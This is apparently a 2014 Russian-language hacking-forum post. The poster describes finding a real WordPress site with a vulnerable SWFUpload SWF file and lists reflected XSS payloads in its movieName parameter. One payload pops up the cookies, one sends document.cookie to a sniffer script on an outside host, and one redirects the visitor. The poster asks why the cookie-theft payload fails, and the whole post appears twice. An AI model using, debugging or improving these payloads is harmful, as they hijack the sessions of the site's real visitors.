agentru
25.02.2014, 03:04
Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.
Алерт отлично отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//
Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//
Даже банальная переадресация, также не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//
Подскажите пожалуйста, в чем может быть причина?
Алерт отлично отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//
Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//
Даже банальная переадресация, также не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//
Подскажите пожалуйста, в чем может быть причина?